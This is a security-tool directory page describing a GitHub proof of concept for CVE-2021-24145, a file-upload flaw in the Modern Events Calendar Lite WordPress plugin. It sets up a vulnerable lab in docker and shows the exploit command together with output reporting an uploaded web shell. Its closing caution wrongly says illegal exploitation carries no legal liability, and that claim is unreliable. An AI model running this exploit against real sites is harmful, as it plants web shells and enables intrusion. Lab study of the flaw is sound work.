Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-24145 — WordPress File Upload Vulnerability, Modern Events Calendar Lite WordPress plugin before 5.16.5 | Kitploit
Tools/GitHubGitHub/dnr6419/cve-2021-24145
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubdnr6419/cve-2021-24145

CVE-2021-24145

WordPress File Upload Vulnerability, Modern Events Calendar Lite WordPress plugin before 5.16.5

View Repository
3244 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-24145

WordPress File Upload Vulnerability, Modern Events Calendar Lite WordPress plugin before 5.16.5 https://nvd.nist.gov/vuln/detail/CVE-2021-24145

Installation and Execution Steps

1. WordPress Installation

When proceeding with installation, please perform port forwarding in the docker-compose.yml file.

root@kitploit:~
 $ docker-compose up  

2. WordPress initial & Plugin installation

Navigate to http://[web-server ip]:port/. Proceed with the basic installation.
Navigate to [Plugins] -> [Add New] -> [Upload Plugin].
Upload and install modern-events-calendar-lite.5.16.2.zip.
The screen below shows the plugin installation completed.
Once installation is complete, activate the plugin.

3. PoC

python3 poc.py -T [URL] -P [PORT] -U [Path] -u [admin] -p [password]

root@kitploit:~
 $python3 poc.py -T 172.30.1.48 -P 80 -U / -u 0ppr2s -p 123456

  ______     _______     ____   ___ ____  _      ____  _  _   _ _  _  ____
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \| || | / | || || ___|
| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__   _| |__   _|__) |
 \____|  \_/  |_____|   |_____|\___/_____|_|    |_____|  |_| |_|  |_||____/

                * Wordpress Plugin Modern Events Calendar Lite RCE

                * @Hacker5preme




[+] Authentication successfull !

[+] Shell Uploaded to: http://172.30.1.48:80//wp-content/uploads/shell.php

image

Source

https://github.com/Hacker5preme/Exploits/tree/main/Wordpress/CVE-2021-24145

Caution

If you illegally exploit the above vulnerability, you will not be held legally responsible.

If you illegally exploit the above vulnerabilities, you will not be held liable.

You must update the docker version to the latest.

Download Tool